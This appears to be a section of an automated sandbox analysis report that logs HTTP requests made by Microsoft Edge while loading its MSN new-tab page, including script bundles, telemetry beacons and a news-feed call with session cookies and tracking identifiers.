Source: global traffic HTTP traffic detected: GET /edge/ntp/service-worker.js?bundles=latest&riverAgeMinutes=2880&navAgeMinutes=2880&networkTimeoutSeconds=5&bgTaskNetworkTimeoutSeconds=8&ssrBasePageNavAgeMinutes=360&enableEmptySectionRoute=true&enableNavPreload=true&enableFallbackVerticalsFeed=true&noCacheLayoutTemplates=true&cacheSSRBasePageResponse=true&enableStaticAdsRouting=true&enableWidgetsRegion=true HTTP/1.1Host: ntp.msn.comConnection: keep-aliveCache-Control: max-age=0Accept: */*Service-Worker: scriptUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-edge-ntp: {"back_block":0,"bg_cur":{"configIndex":26,"imageId":"BB1msOZ4","provider":"CMSImage","userSelected":false},"bg_img_typ":"bing","exp":["msQuickLinksDefaultOneRow","msShoppingWebAssistOnNtp","msShoppingHistogramsOnNtp","msEnableWinHPNewTabBackButtonFocusAndClose","msCustomMaxQuickLinks","msMaxQuickLinksAt20","msAllowThemeInstallationFromChromeStore","msEdgeSplitWindowPrivateTarget","msEdgeSplitWindowLinkMode"],"feed":0,"feed_dis":"onscroll","layout":1,"quick_links_opt":1,"sel_feed_piv":"myFeed","show_greet":true,"vt_opened":false,"wpo_nx":{"v":"2","wgt":{"src":"default"}}}Sec-Fetch-Site: same-originSec-Fetch-Mode: same-originSec-Fetch-Dest: serviceworkerReferer: https://ntp.msn.com/edge/ntp?locale=en-GB&title=New%20tab&dsp=1&sp=Bing&isFREModalBackground=1&startpage=1&PC=U531Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: _C_Auth=; pglt-edgeChromium-dhp=547; sptmarket=en-GB||us|en-us|en-us|en||cf=8|RefA=3A35C6D9C75F44F1A696E1F20ED10EDD.RefC=2025-01-23T19:40:11Z; USRLOC=; MUID=36CB6A348F62672B3E3A7F498E00663A; MUIDB=36CB6A348F62672B3E3A7F498E00663A; _EDGE_S=F=1&SID=31C482BC84B769983F0597C18506681B; _EDGE_V=1; MicrosoftApplicationsTelemetryDeviceId=79152d70-0c76-4bcf-bb6a-0dcbed0d61a3; ai_session=uD0SM9lVnN+ZBovzvvWf2A|1737661217424|1737661217424; sptmarket_restored=en-GB||us|en-us|en-us|en||cf=8|RefA=3A35C6D9C75F44F1A696E1F20ED10EDD.RefC=2025-01-23T19:40:11Z
Source: global traffic HTTP traffic detected: GET /bundles/v1/edgeChromium/latest/ocvFeedback.c1e5c0f1eeb413118a8c.js HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://ntp.msn.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /bundles/v1/edgeChromium/latest/diagnostic-web-vitals.95b1542329807b1f42ef.js HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://ntp.msn.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /bundles/v1/edgeChromium/latest/common-others.918af0be2371c480a676.js HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://ntp.msn.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /bundles/v1/edgeChromium/latest/weather-one-liner.cb56dc4da2dc32a76f42.js HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://ntp.msn.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /bundles/v1/edgeChromium/latest/nurturing-banner.cef8d219ef568729016b.js HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://ntp.msn.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /b2?rn=1737661217429&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=36CB6A348F62672B3E3A7F498E00663A&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*null HTTP/1.1Host: sb.scorecardresearch.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: UID=1D65c52f93929c7a844caee1737661219; XID=1D65c52f93929c7a844caee1737661219
Source: global traffic HTTP traffic detected: GET /service/news/feed/pages/weblayout?User=m-36CB6A348F62672B3E3A7F498E00663A&activityId=3A35C6D9-C75F-44F1-A696-E1F20ED10EDD&adminDisabled=false&adoffsets=c1:-1,c2:-1,c3:-1&adsTimeout=600&apikey=0QfOX3Vn51YCzitbLaRkTTBadtWpgTN8NZLW0C1SEM&audienceMode=adult&backgroundImageIsSet=false&cm=en-us&colstatus=c1:0,c2:0,c3:0&column=c3&colwidth=300&cookieWallPresent=false&dhp=1&disablecontent=true&inEdgeFeatures=false&it=app&l3v=2&layout=c3&memory=8&mobile=false&newsSkip=0&newsTop=48&ocid=anaheim-ntp-feeds&pgc=547&revertTimes=0&scn=APP_ANON&timeOut=1000&vpSize=1232x876&wposchema=byregion HTTP/1.1Host: assets.msn.comConnection: keep-aliveads-referer: https://ntp.msn.com/edge/ntp?locale=en-GB&title=New%20tab&dsp=1&sp=Bing&isFREModalBackground=1&startpage=1&PC=U531sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"OneSvc-Uni-Feat-Tun: EdgeInterestTier1Ids:null;LoginState:NA;Product:anaheim;PageName:default;PageType:dhp;OCID:msedgdhp;ViewPortWidth:1280;ViewPortHeight:984;sec-ch-ua-mobile: ?0taboola-sessionId: initUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Origin: https://ntp.msn.comSec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: USRLOC=; MUID=36CB6A348F62672B3E3A7F498E00663A; _EDGE_S=F=1&SID=31C482BC84B769983F0597C18506681B; _EDGE_V=1; MUIDB=36CB6A348F62672B3E3A7F498E00663A
Source: global traffic HTTP traffic detected: GET /bundles/v1/edgeChromium/latest/background-gallery.ca616469ff36f5744808.js HTTP/1.1Host: assets.msn.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept: */*Origin: https://ntp.msn.comSec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /c.gif?rnd=1737661217428&udc=true&pg.n=default&pg.t=dhp&pg.c=547&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-us&rid=3a35c6d9c75f44f1a696e1f20ed10edd&activityId=3a35c6d9c75f44f1a696e1f20ed10edd&d.imd=false&scr=1280x1024&anoncknm=app_anon&issso=&aadState=0&ctsa=mr&CtsSyncId=D9667FD42A7C4264B9BD8B71E5B83A72&MUID=36CB6A348F62672B3E3A7F498E00663A HTTP/1.1Host: c.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: USRLOC=; MUID=36CB6A348F62672B3E3A7F498E00663A; _EDGE_S=F=1&SID=31C482BC84B769983F0597C18506681B; _EDGE_V=1; SM=T; _C_ETH=1
Source: global traffic HTTP traffic detected: GET /bundles/v1/edgeChromium/latest/toast-wc.7856acab3c9f6f3af2bf.js HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://ntp.msn.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /bundles/v1/edgeChromium/latest/waffle-wc.5e95a6e8b96055fbd144.js HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://ntp.msn.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /bundles/v1/edgeChromium/latest/card-actions-wc.2e0b8bb8c51bf53bcad3.js HTTP/1.1Host: assets.msn.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept: */*Origin: https://ntp.msn.comSec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /bundles/v1/edgeChromium/latest/common-segments.f68ee5aa19f6973c90eb.js HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://ntp.msn.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /bundles/v1/edgeChromium/latest/d3-library.3d830fc6f0392332c923.js HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://ntp.msn.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /bundles/v1/edgeChromium/latest/cs-core-desktop_card-components_dist_card-banner_index_js-cs-core-desktop_card-components_dis-389dd7.6716c93e27d7e156d3e5.js HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://ntp.msn.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /bundles/v1/edgeChromium/latest/channel-data-connector.b857251407e592f709ce.js HTTP/1.1Host: assets.msn.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept: */*Origin: https://ntp.msn.comSec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /bundles/v1/edgeChromium/latest/libs_weather-shared-wc_dist_weather-card_index_js-libs_weather-skycode-mapping-svgr_dist_SkyC-851a44.0b2e04a6db31fd8116de.js HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://ntp.msn.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /bundles/v1/edgeChromium/latest/channel-store.01ae09ee4eb1e37ccd19.js HTTP/1.1Host: assets.msn.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept: */*Origin: https://ntp.msn.comSec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /bundles/v1/edgeChromium/latest/welcomeGreetingLight.c096cf224eef0c6fdab2.js HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://ntp.msn.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /bundles/v1/edgeChromium/latest/common-settings-edgenext.da6c246e4c4e1ecb1b37.js HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://ntp.msn.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /bundles/v1/edgeChromium/latest/sign-in-control-wc.367cab6cb9bb41af1876.js HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://ntp.msn.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /bundles/v1/edgeChromium/latest/libs_location-service_dist_AutoSuggestService_index_js-libs_location-service_dist_profiles_We-e648aa.e53e905b38f230baccdd.js HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://ntp.msn.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /bundles/v1/edgeChromium/latest/weather-card-data-connector.e2f4ce38bbe0723c1fcf.js HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://ntp.msn.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /bundles/v1/edgeChromium/latest/codex-bing-chat.6e25fe85c86c209cb04f.js HTTP/1.1Host: assets.msn.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept: */*Origin: https://ntp.msn.comSec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /bundles/v1/edgeChromium/latest/MarketMismatchCoachMark.383c94a7f98d2806de2d.js HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://ntp.msn.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /staticsb/statics/latest/common/icons/copilot_color.svg HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: USRLOC=; MUID=36CB6A348F62672B3E3A7F498E00663A; _EDGE_S=F=1&SID=31C482BC84B769983F0597C18506681B; _EDGE_V=1; MUIDB=36CB6A348F62672B3E3A7F498E00663A; _C_ETH=1; msnup=%7B%22cnex%22%3A%22no%22%7D
Source: global traffic HTTP traffic detected: GET /bundles/v1/edgeChromium/latest/common-sports-lib.3072cfffd436683e04b9.js HTTP/1.1Host: assets.msn.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept: */*Origin: https://ntp.msn.comSec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /staticsb/statics/latest/marketmismatch/bannerDisplayString/en-gb.json HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Origin: https://ntp.msn.comSec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /bundles/v1/edgeChromium/latest/float-button-group-wc.a178620524f626faaa26.js HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://ntp.msn.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /bundles/v1/edgeChromium/latest/feedback.aaa33c6ca151df54bcca.js HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://ntp.msn.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /bundles/v1/edgeChromium/latest/scrollPerfMetricTrackers.0c056f3a2106f33fad55.js HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://ntp.msn.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /bundles/v1/edgeChromium/latest/common-windows-widget-shared.293d4dd273a8bc2b7194.js HTTP/1.1Host: assets.msn.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept: */*Origin: https://ntp.msn.comSec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
